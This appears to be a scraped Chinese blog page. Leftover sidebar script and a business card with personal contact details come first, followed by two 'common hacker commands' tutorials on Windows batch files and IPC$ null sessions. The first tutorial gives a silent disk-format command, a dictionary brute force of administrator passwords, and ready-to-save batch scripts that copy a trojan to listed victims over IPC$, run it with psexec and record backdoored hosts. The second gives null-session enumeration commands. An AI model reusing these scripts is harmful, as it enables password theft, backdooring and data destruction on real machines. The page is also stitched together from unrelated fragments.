document.all[layerName].style.top = eval(layerName).curTop
}
eval(layerName).timer=setTimeout('moveAlong_r("'+layerName+'",'+paceLeft+','+paceTop+','+fromLeft+','+fromTop+')',30)
}
function setPace(layerName, fromLeft, fromTop, motionSpeed){
eval(layerName).gapLeft = (Math.max(eval(layerName).curLeft, fromLeft) - Math.min(eval(layerName).curLeft, fromLeft))/motionSpeed
eval(layerName).gapTop = (Math.max(eval(layerName).curTop, fromTop) - Math.min(eval(layerName).curTop, fromTop))/motionSpeed
moveAlong_r(layerName, eval(layerName).gapLeft, eval(layerName).gapTop, fromLeft, fromTop)
}
var expandState_r = 0
var clickNum_r = 0
function expand_r(){
if (clickNum_r==0){
clickNum_r=1
if(expandState_r == 0){setPace("vwork_master_r", document.body.clientWidth , 10, 10);
document.menutop_r.src="../images/an2.gif"; expandState_r = 1;}//end if
else{
setPace("vwork_master_r", vwork_master_r_width , 10, 10);
document.menutop_r.src="../images/an2.gif"; expandState_r = 0;}//end if
setTimeout("expandend_r()", 100);
}
}//end function
function expandend_r(){
clickNum_r=0;
}
document.write ('<div id=vwork_master_r>');
document.write (' <div id=vwork_menu_r onmouseover=expand_r() style=cursor:hand;>');
document.write (' <table border=0 cellpadding=0 cellspacing=0 width=35>');
document.write (' <tbody>');
document.write (' <tr>');
document.write (' <td width=100%><img name=menutop_r src=../images/an2.gif alt="点击此处隐藏或展开客服中心"></td>');
document.write (' </tr>');
document.write (' </tbody>');
document.write (' </table>');
document.write (' </div>');
document.write (' <div id=vwork_screenlinks_r >');
document.write (' <table width="142" border="0" cellpadding="0" cellspacing="0">');
document.write (' <tr>');
document.write (' <td width="4" background="images/tiao.gif"></td>');
document.write (' <td width="112" align="center" valign="top"><table width="100%" height="18" border="0" cellpadding="0" cellspacing="0">');
document.write (' <tr>');
document.write (' <td> </td>');
document.write (' </tr>');
document.write (' </table>');
document.write ('<table width="100%" border="0" cellspacing="0" cellpadding="0">');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE cellSpacing=0 cellPadding=0 width=96 border=0><TBODY><TR><TD height=33><A href="http://www.vwork.cn/include/Call_center1.asp?callid=91016001"><IMG style="BORDER-LEFT-COLOR: #ffffff; FILTER: ; BORDER-BOTTOM-COLOR: #ffffff; WIDTH: 97px; BORDER-TOP-COLOR: #ffffff; HEIGHT: 34px; BORDER-RIGHT-COLOR: #ffffff" height=34 alt="" hspace=0 src="/zhima/editor/UploadFile/200652116374591.gif" width=97 border=0></A></TD></TR><TR><TD align=middle height=43><P align=left><SPAN class=STYLE1> <U><A href="http://voip.whwise.com"><FONT color=#777777>视频会议室</FONT></A></U></SPAN></P></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE cellSpacing=0 cellPadding=0 width=96 border=0><TBODY><TR><TD height=33><A href="http://www.vwork.cn/chat/msg.htm?hotid=91016001"><IMG style="FILTER: ; WIDTH: 99px; HEIGHT: 41px" height=41 alt="" hspace=0 src="/zhima/editor/UploadFile/2006521163845242.gif" width=99 border=0></A><A href="http://www.vwork.cn/index.asp"></A></TD></TR><TR><TD class=STYLE1 align=middle height=43><P align=left> <U><A href="http://www.vwork.cn/chat/chat.htm?hotid=91016001&mode=video"><FONT color=#777777>网页电话</FONT></A></U></P></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE cellSpacing=0 cellPadding=0 width=96 border=0><TBODY><TR><TD height=33> <A href="http://wpa.qq.com/msgrd?V=1&Uin=61337315"><IMG style="FILTER: ; WIDTH: 65px; HEIGHT: 66px" height=66 alt="" hspace=0 src="/zhima/editor/UploadFile/2006521163937112.bmp" width=65 border=0></A></TD></TR><TR><TD class=STYLE1 align=middle height=43><P align=left> <U><A href="http://freeqq2.qq.com/1.shtml"><FONT color=#777777>在线QQ</FONT></A></U></P></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width="100%" border=0><TBODY><TR><TD align=middle><TABLE cellSpacing=0 cellPadding=0 width=96 border=0><TBODY><TR><TD height=33><P align=left><A href="callto://wkn13307187196"><IMG title="Go to Skype.com homepage" style="BORDER-LEFT-COLOR: #ffffff; FILTER: ; BORDER-BOTTOM-COLOR: #ffffff; WIDTH: 89px; BORDER-TOP-COLOR: #ffffff; HEIGHT: 38px; BORDER-RIGHT-COLOR: #ffffff" height=40 alt=Skype hspace=0 src="http://www.skype.com/i/logos/skype_logo.png" width=96 border=0></A></P></TD></TR><TR><TD class=STYLE1 align=middle height=43><P align=left> <U><A href="http://skypetools.tom.com/voucher/register.php"><FONT color=#777777>Skype通讯</FONT></A></U></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE style="WIDTH: 36px; HEIGHT: 25px" cellSpacing=0 cellPadding=0 width=36 border=0><TBODY><TR><TD><P align=left><FONT color=#ff0000 size=1><A href="http://scs1.sh1.china.alibaba.com/msg.atc?v=1&uid=whwise" target=_blank><IMG alt=点击这里可以给对方发送消息 src="http://scs1.sh1.china.alibaba.com/online.atc?v=1&uid=whwise&s=101" border=0></A> <DIV style="DISPLAY: none"><A href="http://www.alibaba.com/">Alibaba</A></DIV></FONT></TD></TR></TBODY></TABLE><P><U><STRONG><A href="http://china.alibaba.com/member/join.htm?tracelog=MyAlibaba_TradeToolbar"><FONT color=#777777>阿里巴巴贸易通</FONT></A></STRONG></U></P></TD>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width="100%" border=0><TBODY><TR><TD align=middle><TABLE cellSpacing=0 cellPadding=0 width=96 border=0><TBODY><TR><TD height=33><A target=_top><IMG title=MSN style="FILTER: ; WIDTH: 115px; HEIGHT: 35px" height=35 alt=MSN hspace=0 src="/zhima/editor/UploadFile/200652116410143.gif" width=115 border=0 ?></A></TD></TR><TR><TD class=STYLE1 align=middle height=43><P align=left> <FONT face=宋体 color=#777777 size=3><U><A href="http://get.live.com/messenger/overview"><STRONG>MSN</STRONG></A></U></FONT></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <P> <A href="wangwang:SendIM?godhamhamchang&uid_t=whwkn"><IMG style="BORDER-LEFT-COLOR: #ffffff; FILTER: ; BORDER-BOTTOM-COLOR: #ffffff; WIDTH: 103px; BORDER-TOP-COLOR: #ffffff; HEIGHT: 51px; BORDER-RIGHT-COLOR: #ffffff" height=51 alt="" hspace=0 src="/zhima/editor/UploadFile/2006521164319194.gif" width=103 border=0></A></P><P> <U><A href="http://www.taobao.com/help/wangwang/wangwang.php"><FONT color=#777777><STRONG>淘宝旺旺</STRONG></FONT></A></U></P>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <P> <A onclick="return rd_clk(""logo/messenger/"",""http://cn.messenger.yahoo.com/"");" href="http://" target=_self><IMG style="FILTER: ; WIDTH: 44px; HEIGHT: 46px" height=46 alt="" hspace=0 src="/zhima/editor/UploadFile/2006521164446434.gif" width=44 border=0></A></P><P> <A href="http://cn.messenger.yahoo.com/"><FONT color=#777777><STRONG>雅虎通</STRONG></FONT></A></P>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <A href="http://register.sdo.com/register.asp?from=19" target=_blank><IMG style="FILTER: ; WIDTH: 87px; HEIGHT: 105px" height=105 alt="" hspace=0 src="/zhima/editor/UploadFile/2006521164526123.gif" width=87 border=0></A>');
document.write (' </td>');
document.write (' </tr>');
document.write ('</table>');
document.write (' </td>');
document.write (' <td width="15" background="images/bg_1.gif" height="800" id="menu_right"> </td>');
document.write (' </tr>');
document.write (' </table>');
document.write (' </div>');
document.write ('</div>');
var sidemenu = document.all.vwork_master_r;
sidemenu.style.top = document.body.scrollTop+2
menu_left.height=document.body.scrollHeight+100;
menu_right.height=document.body.scrollHeight;
function yuzi(){
}
setInterval("yuzi()",100);
expand_r();
-->
</script>
<div style="LEFT:200px; POSITION:absolute; TOP:30px; width: 708px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><P align=left><A title=公司资源 href="http://www.whwise.com/zhima/N_Blog/FeedBack.asp?mid=3554&id=882" target=_blank><FONT color=#444444>公司资源</FONT></A><FONT color=#444444> <A title=教育培训 href="http://www.whwise.com/zhima/N_Blog/ArticleList.asp?mid=3554&classid=217" target=_blank><FONT color=#444444>教育培训</FONT></A></FONT><FONT color=#444444> </FONT><A title=项目推荐 href="http://www.whwise.com/zhima/N_Blog/ArticleList.asp?mid=3554&classid=218" target=_blank><FONT color=#444444>项目推荐</FONT></A><FONT color=#444444> </FONT><A title=名扬天下产品介绍 href="http://www.whwise.com/zhima/N_Blog/ArticleList.asp?mid=3554&classid=212" target=_blank><FONT color=#444444>产品介绍</FONT></A><FONT color=#444444> </FONT><A title=名扬天下如何赢利 href="http://www.whwise.com/zhima/N_Blog/ArticleList.asp?mid=3554&classid=211" target=_blank><FONT color=#444444>如何赢利</FONT></A><FONT color=#444444> </FONT><A title=名扬天下推广技巧 href="http://www.whwise.com/zhima/N_Blog/ArticleList.asp?mid=3554&classid=210" target=_blank><FONT color=#444444>推广技巧</FONT></A><FONT color=#444444> </FONT><A title=名扬天下操作手册 href="http://www.whwise.com/zhima/N_Blog/ArticleList.asp?mid=3554&classid=209" target=_blank><FONT color=#444444>操作手册</FONT></A><FONT color=#444444> </FONT><A title=名扬天下代理合作 href="http://www.whwise.com/zhima/N_Blog/FeedBack.asp?mid=3554&id=738" target=_blank><FONT color=#444444>代理合作</FONT></A><FONT color=#444444> <A title=增值服务 href="http://wwww.whwise.com/PHB/Article.asp?id=160&MOB=7" target=_blank><FONT color=#444444>兼职专栏</FONT></A></FONT> <A href="http://emailpage.activepower.net/script/user/send.asp?emailpage_id=26398"><FONT color=#444444>推荐给朋友</FONT></A><FONT color=#444444><BR> <A href="http://www.whwise.net"><IMG src="/zhima/editor/UploadFile/200694221925720.gif" border=0></A></FONT></P></td>
</tr>
</table>
</div>
<table width="100" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="50"> </td>
</tr>
</table>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>商务白领</title>
<style type="text/css">
<!--
.STYLE1 {
color: #4269BD;
font-weight: bold;
}
.STYLE3 {
color: #980105;
font-size: 16px;
font-weight: bold;
}
body,td,th {
font-size: 12px;
}
.STYLE4 {color: #9C0000}
body {
margin-top: 50px;
}
-->
</style>
</head>
<body>
<table width="550" height="482" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td valign="top" background="../images/Card/104.gif"><table width="100%" height="180" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> </td>
</tr>
</table>
<table width="100%" height="295" border="0" cellpadding="0" cellspacing="0">
<tr>
<td valign="top"><table width="100%" height="294" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="52%" valign="top"><table width="90%" border="0" align="right" cellpadding="0" cellspacing="0">
<tr>
<td height="80"> </td>
</tr>
<tr>
<td align="left" style="line-height:18px;"><span class="STYLE3">姓名</span> 火狐狸 业务员<br />
武汉万思网络有限公司
<br />
武汉市江汉区宝丰二路天骄国际1905室<br /></td>
</tr>
<tr>
<td height="100" align="center" style="line-height:18px;"><a href="" target="_blank"><img src="../images/Mphoto.gif" width="108" height="128" alt="我的照片" border=0 /></a></td>
</tr>
</table></td>
<td width="48%" valign="top" style="line-height:18px;"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>邮 编: 430061 <br />
电 话: 027-63218035<br />
传 真: 027-82668112-809 <br />
手 机: 13871069405<br />
网 址: <a href='http://' target="_blank"><font color="#FF0000"></font></a><br />
E-mail: <span class="STYLE4">wang_dongliang@sohu.com</span><br />
Q Q :
<a href="" target="_blank"> <font color="#FF0000">61337315</font></a><br />
MSN : <span class="STYLE4"></span><br />
贸 易 通:<span class="STYLE4"> </span><br />
雅 虎 通:<span class="STYLE4"> </span><br />
Skype : <br />
网络电话:
<a href="#" target="_blank"> <font color="#FF0000"></font></a></td>
</tr>
<tr>
<td height="50" align="left"><table width="97%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td> </td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>
<table width="600" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="30"> </td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><P align=center><A href="http://whkmz.900me.com/go/"></A> <IFRAME id=baiduframe border=0 marginWidth=0 frameSpacing=0 marginHeight=0 src="http://unstat.baidu.com/bdun.bsc?tn=whwkn_pg&cv=0&cid=1030766&csid=1&rkcs=19&bgcr=FFFFFF&ftcr=0000CC&rk=1&bd=0&tbsz=12&tbst=0&sropls=1,4,6,2,3&wd=580&ht=50&kwnm=9&kwgp=1&sropst=1&bdas=0" frameBorder=0 width=580 scrolling=no height=50> </IFRAME><BR><FONT color=#777777><BR><A href="http://www.miibeian.gov.cn/login.jsp"><FONT face=宋体 color=#777777 size=2>ICP备案编号:</FONT></A><A href="http://www.miibeian.gov.cn/login.jsp"><FONT face=宋体 color=#00a3cc size=2>鄂ICP备05002940号</FONT></A><MAP name=AutoMap1><FONT color=#00a3cc> </FONT><FONT color=#00a3cc><FONT color=#777777>工商执照:</FONT>4201002170078 <FONT color=#777777>组织机构代码:</FONT>72270962-8<BR></P></FONT></MAP></FONT></td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
posted @
2007-01-26 16:37 MEYE 阅读(612) |
评论 (1) |
编辑 收藏
黑客常用 命令2(批处理命令)
|
|
|
|
|
批处理命令
1、Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on│off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一 些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命 令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个 参数给我们,效果和/y是一样的。)
3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label (label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根 据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。
4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后 修改。 Rem Message Sample:@Rem Here is the description.
5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:\back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。
6.Call 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在 脚本或批处理文件外使用 Call,它将不会在命令行起作用。 语法 call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 参数 [Drive:}[Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。
7.start 命令 调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执 行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入 的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: test.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag (应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end
:defrag c:\dos\defrag goto end :mem mem goto end :end echo good bye
此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标 号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以 goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。
9.If 命令
if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式: 1、if "参数" == "字符串" 待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms
2、if exist 文件名 待执行的命令 如果有指定的文件,则条件成立,运行命令,否则运行下一句。 如if exist config.sys edit config.sys
3、if errorlevel / if not errorlevel 数字 待执行的命令 如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 如if errorlevel 2 goto x2 DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。
10.for 命令 for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
for {%variable│%%variable} in (set) do command [ CommandLineOptions] %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I
如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 支持:
FOR /D %variable IN (set) DO command [command-parameters]
如果集中包含通配符,则指定与目录名匹配,而不与文件 名匹配。
FOR /R [[drive:]path] %variable IN (set) DO command [command-
检查以 [drive:]path 为根的目录树,指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录,则使用当前 目录。如果集仅为一个单点(.)字符,则枚举该目录树。
FOR /L %variable IN (start,step,end) DO command [command-para
该集表示以增量形式从开始到结束的一个数字序列。 因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command
或者,如果有 usebackq 选项:
FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command
filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前,每份文件都已被打开、读取并经过处理。 处理包括读取文件,将其分成一行行的文字,然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为:
eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。
sample1: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 取得第二个符号,引用 %j 来取得第三个符号,引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名,您需要用双引号将文件名括起来。为了用这种方式来使 用双引号,您还需要使用 usebackq 选项,否则,双引号会 被理解成是用作定义某个要分析的字符串的。
%i 专门在 for 语句中得到说明,%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或 'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 同时不能有 52 个以上都在使用中。
您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 用单引号将括号之间的 filenameset 括起来。这样,该字符 串会被当作一个文件中的一个单一输入行。
最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 内存,并被当作文件分析。因此,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
会枚举当前环境中的环境变量名称。
另外,FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法:
~I - 删除任何引号("),扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属性 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义,或者没有找到文件,此组合键会扩充 空字符串
可以组合修饰符来得到多重结果:
%~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR
在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读,而且避免与不分大小写的组合键混淆。
以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。
sample2:
利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密 码。 最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find 命令-- for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"│find ":命令成功完成">&g t;D:\ok.txt ,这样就ko了。
sample3:
你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁 闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明 白了。
主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call cultivate.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给cultivate.bat中的参 数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim并用返回码(If errorle ver =)来筛选成功种植后门的主机并echo出来,或者echo到文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样 的了。应该根据%%i %%j %%k表示的对象来,一般就是 ip password username。
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \\%1\ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @p***ec \\%1 c:\winnt\system32\windrv32.exe @p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目 录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕 虫).此处不多做叙述,有兴趣的朋友可自行研究.
|
黑客常用 命令5(ipc$命令)
|
|
|
|
|
一 摘要 注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列。
二 什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道, 通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程 计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连 接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$ ……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在 有意无意中,导致了系统安全性的降低。 平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么 说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?
三 什么是空会话 在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。 在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道, 建立双方通过它互通信息,这个过程的大致顺序如下: 1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建 立; 2)服务器产生一个随机的64位数(实现挑战)传送回客户; 3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结 果返回到服务器(实现响应); 4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者 身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控 制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到 服务器上的资源直到建议的会话被终止。 以上是一个安全会话建立的大致过程,那么空会话又如何呢?
空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模 型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中 不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符S ID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户 名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于 系统内置的帐号),这个访问令牌包含下面伪装的组: Everyone Network 在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作 什么呢?
四 空会话可以做什么 对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问 小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只 有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。 从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺 少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解 的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会 话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令:
1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$) 命令:net use \\ip\ipc$ "" /user:"" 注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。
2 查看远程主机的共享资源 命令:net view \\ip 解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结 果,但此命令不能显示默认共享。
在 \\*.*.*.*的共享资源 资源共享名 类型 用途 注释
----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。
